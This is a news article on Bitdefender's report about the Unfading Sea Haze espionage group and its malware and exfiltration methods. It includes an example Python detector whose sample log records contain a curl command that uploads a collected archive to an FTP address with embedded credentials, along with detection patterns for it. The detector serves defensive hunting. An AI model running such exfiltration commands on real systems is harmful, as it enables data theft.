Unfading Sea Haze: How hackers are trying to redraw the map of the South China Sea

Tomcat

A group possibly linked to China has been terrorizing Asia for 6 years.

Bitdefender, a developer of antivirus solutions, is investigating the activities of a hacker group called Unfading Sea Haze. According to a recent report, this low-profile group has been operating since 2018 and is likely acting in the interests of China.

In their report, Bitdefender researchers describe in detail the attackers and their methods of compromising Windows computers and then infecting them with spyware to steal data. Unfading Sea Haze attacks, which mainly target government and military organizations, are highly sophisticated.

Experts have not been able to definitively establish the origin and true goals of Unfading Sea Haze. However, they state with confidence that the attacks they have studied do not overlap with any already known campaign.

Analysts concluded that the hackers are based in China on the basis of several factors: the choice of victims around the South China Sea, the use of tools popular among Chinese actors, and attack scenarios similar to the methods of another politically motivated group, APT41.

The South China Sea is of great strategic importance to China from a geopolitical and economic point of view. Control of this region provides access to the Pacific Ocean and advantages in trade routes. At the same time, other states in the region (Malaysia, the Philippines, Vietnam and some others) claim certain sections of the sea. China also puts forward territorial claims to almost the entire water area, as evidenced by the so-called "nine-dash line", the designation of sea borders drawn on maps published by the PRC.

According to the report, the first successful Unfading Sea Haze attack on Windows systems dates back to at least 2018. Bitdefender was able to confirm that hackers used targeted phishing mailings to gain access, disguising malicious files as legitimate documents.

In total, at least eight organizations, mainly government agencies and military sector structures, became victims of Unfading Sea Haze. As indicated in the study, in March 2023 the attackers upgraded their techniques, learning to run malicious code directly from RAM without writing it to disk, which made detection harder.

Various malicious programs were installed on compromised systems, including Trojans from the Gh0st RAT family and the Ps2dllLoader utility. The malicious code disguised itself as legitimate scheduled tasks and harmless extensions, but actually loaded malicious DLLs to conduct covert espionage. These libraries intercepted keystrokes, stole confidential data stored in browsers, and scanned removable media as soon as it was plugged in.

All data collected by the hackers, including stolen confidential files, was sent to the attackers over FTP using the curl utility. Initially, static credentials hard-coded into the malware were used for access, but later the group switched to dynamically generating usernames and passwords.
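Two of the behaviours described above, a scheduled task loading a DLL from a user-writable folder and curl pushing files to an FTP server with credentials embedded in the URL, are easy to hunt for in process-creation telemetry. The following detector is an added example, not code from the Bitdefender report; the log records, paths and the 203.0.113.10 address are constructed, and it assumes task-spawned processes appear with svchost.exe as their parent, as in Sysmon Event ID 1.

```python
import re
from urllib.parse import urlsplit

# Constructed sample process-creation records: (parent image, image, command line).
# All values are invented for this example, not indicators from the report.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\System32\\rundll32.exe",
     "rundll32.exe C:\\Users\\Public\\Libs\\update.dll,Start"),
    ("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\curl.exe",
     "curl.exe -T C:\\Users\\Public\\collect.zip ftp://svc:Passw0rd@203.0.113.10/in/"),
    ("C:\\Windows\\explorer.exe", "C:\\Program Files\\Backup\\backup.exe",
     "backup.exe --sync"),
]

# Locations a standard user can write to; a task-loaded DLL living here is suspicious.
WRITABLE_DIRS = re.compile(r"\\(users\\public|appdata|temp|programdata)\\", re.I)
DLL_LOADERS = {"rundll32.exe", "regsvr32.exe"}
FTP_URL = re.compile(r"\b(ftps?|sftp)://\S+", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(parent, image, cmdline):
    """Return the detection tags that apply to one process-creation record."""
    tags = []
    name = basename(image)
    # Rule 1: curl transferring data to an FTP endpoint; flag inline credentials separately.
    if name == "curl.exe":
        match = FTP_URL.search(cmdline)
        if match:
            tags.append("curl_ftp_transfer")
            if urlsplit(match.group(0)).username:
                tags.append("credentials_in_url")
    # Rule 2: the task scheduler host spawning a DLL loader whose library sits in a
    # user-writable path, the masquerading pattern described in the article.
    if basename(parent) == "svchost.exe" and name in DLL_LOADERS and WRITABLE_DIRS.search(cmdline):
        tags.append("task_loads_dll_from_writable_path")
    return tags


def scan(events):
    """Map each suspicious command line to its tags; records with no tags are dropped."""
    return {cmd: tags for p, i, cmd in events if (tags := classify(p, i, cmd))}


if __name__ == "__main__":
    for cmd, tags in scan(SAMPLE_EVENTS).items():
        print(", ".join(tags), "<-", cmd)
```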

According to experts, the attackers from Unfading Sea Haze gradually changed both their tactics and their tools. Since the group was only recently exposed, its innovations were probably part of a focused long-term plan rather than a spontaneous response to incidents as they arose.

A Bitdefender representative explained that the company is aware of the public interest, but for security reasons cannot disclose specific countries or organizations that have been targeted by hackers.